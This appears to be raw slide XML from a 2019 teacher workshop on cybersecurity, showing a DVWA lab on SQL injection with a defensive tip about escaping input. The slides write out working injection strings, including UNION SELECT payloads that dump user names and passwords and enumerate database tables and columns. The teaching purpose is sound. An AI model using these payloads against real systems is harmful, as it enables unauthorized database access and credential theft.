                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>password: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>password</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Click “DVWA Security” on the left.</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Set to “low” security in the dropdown then “Submit”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:b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Click “SQL Injection” on the left.</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Enter 1 for User ID</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The webpage creates (unseen to us) this query:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>first_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> FROM users WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = ‘1’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="24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72533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SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="10089836" cy="2677656"/>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What if we put </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>data in the textbox that allows us to do more queries?</a:t>
            </a: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 OR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=‘2’ #</a:t>
            </a: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 OR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> &lt;&gt; ‘1’ #</a:t>
            </a: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0’; SHOW TABLES;</a:t>
            </a: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a’ OR username = ‘admin’ #</a:t>
            </a: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a’ OR users = ‘admin’ #</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2209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SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="10089836" cy="4893647"/>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What if we put </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>data in the textbox that allows us to do more queries?</a:t>
            </a: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 and 1=0 union select null,</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concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(first_name,0x0a,last_name,0x0a,user,0x0a,password)</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	from users #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1"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 and 1=0 union select null, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1"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 and 1=0 union select null, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(table_name,0x0a,column_name) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = 'users’ #</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8DADCFB-6802-4527-A090-9DAE04BE7BF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6760071" y="5837417"/>
            <a:ext cx="4831194" cy="923330"/>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0x0a is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hexidecimal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</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0x0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="-25000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="-25000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</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Decimal 10 in ASCII is “LF” or “Line Feed”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="227013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SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="10089836"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To protect against SQL Injection, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sanitize </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>those inputs!</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Do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" u="sng" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> trust the user…         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ever</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"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In PHP: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mysqli_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>( ) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="24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89985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84000" y="6273800"/>
            <a:ext cx="406400" cy="584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042" y="1153686"/>
            <a:ext cx="4207084" cy="2636439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6015973" y="1062812"/>
            <a:ext cx="5887450" cy="934429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Thank you!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5974408" y="2290771"/>
            <a:ext cx="5887451" cy="93442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CD6B00"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>weteachcs.org</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5913527" y="842156"/>
            <a:ext cx="96252" cy="32164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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0588525E-CF28-424E-81D0-7F63BE21A52D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4319588"/>
            <a:ext cx="12192000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="8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solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>CS Workshop July 15-16 2019</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE7F53AF-B6AF-4B44-8CFB-626B3E6C745A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="101600" y="4864791"/>
            <a:ext cx="3968000" cy="1733873"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2667" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CD6B00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>John B. Owen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333F48"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CS Professional Development Specialist </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333F48"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The University of Texas at Austin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>johnbowen@utexas.edu </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Connector 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2595A0D-C742-41DE-AFDA-06A601DAFA95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4404140" y="5108358"/>
            <a:ext cx="0" cy="1308100"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="CD6B00"/>
            </a:solidFill>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DFCCCAA3-D847-4777-A317-40597879857D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4738680" y="4880180"/>
            <a:ext cx="3068724" cy="1723549"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2667" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CD6B00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tommy Gober</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333F48"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Curriculum Development Specialist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333F48"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NICERC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>tommy.gober@cyber.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Connector 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92F02E8F-4B62-4E6E-80CD-2D3ED89CF4EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8141944" y="5108358"/>
            <a:ext cx="0" cy="1308100"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="CD6B00"/>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B1C9ED8-8FF9-4ACB-98BE-598D711FC944}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8476485" y="4854563"/>
            <a:ext cx="3427859" cy="1733873"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2667" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CD6B00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>John F. Owen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333F48"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Practice Manager, Data &amp; Analytics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333F48"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Set Solutions, Inc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>setsolutions.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="147689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3062968" y="2407609"/>
            <a:ext cx="6066063"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278115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754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Rootkit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Software package designed to grant unauthorized, privileged access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="408346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2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
